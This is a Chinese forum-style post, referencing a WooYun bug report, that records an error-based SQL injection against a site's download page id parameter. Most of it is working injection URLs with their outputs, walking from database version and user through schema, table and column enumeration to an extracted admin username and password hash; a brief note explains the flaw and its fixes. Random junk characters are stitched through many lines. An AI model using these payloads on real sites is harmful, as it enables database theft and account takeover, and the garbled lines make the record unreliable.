http://www.wooyun.org/bugs/wooyun-2010-01666
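之前想找个测试,没想到这有,可以测试下,做个记录而已。
(说明:这是报错型注入——id 参数被原样拼进 SQL,而且页面会回显数据库错误,子查询的结果才会出现在报错信息里。修复方法是对 id 使用参数化查询或强制转换为整数,并关闭对外的数据库错误回显;下文的 passwd 值看起来是未加盐的 32 位十六进制摘要,应改用带盐的慢哈希存储。)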
% _ F( s! e- R3 H9 R4 ~http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php
或者
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********user()**********/
7 K1 d8 n% j) O X9 q J0 Nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********database()**********/ leqi
% P3 c# I% {% u# d! z8 g3 z1 F2 thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
8 m% D( _8 e$ P7 Y% H6 I( m% X4 shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003( U, t) l" e7 M) w& h! S r) N d3 P
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0039 ?/ V" j; T' v/ A" ?/ x8 v, M7 } Y
test
/**********limit依次递归爆表名**********/
# k# F2 k4 _- r, R. K$ k, Yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0038 a7 |; }7 N# I7 d6 q
users
/**********limit依次递归爆字段名**********/
; A$ ]8 ^% a& b' a2 ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
4 R# R: c, _8 R& ]8 o+ Ihttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23" X- E; j O. \1 G
/wapc/5000_0005_0039 u+ w2 o8 q- C' U4 k
11 210 r' Q+ S) ]0 A* t
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23* m/ |0 U/ W7 Z/ x: C3 A2 q! @
/wapc/5000_0005_0039 J) u8 d! c' r/ Q& d: ^+ ?2 _
11 341 351 361' V v0 A0 A$ u0 V r
/**********爆数据**********/
* L+ |- e# V0 ^& f. Ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
( c$ ~- R* ]$ ^. C. c! t5 D% n$ S* Hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23! ~$ F% s/ s! N
6a8b4574ca231eb8bd52764d4978ffcd. x8 `( G) y( @+ T) G# I# O7 V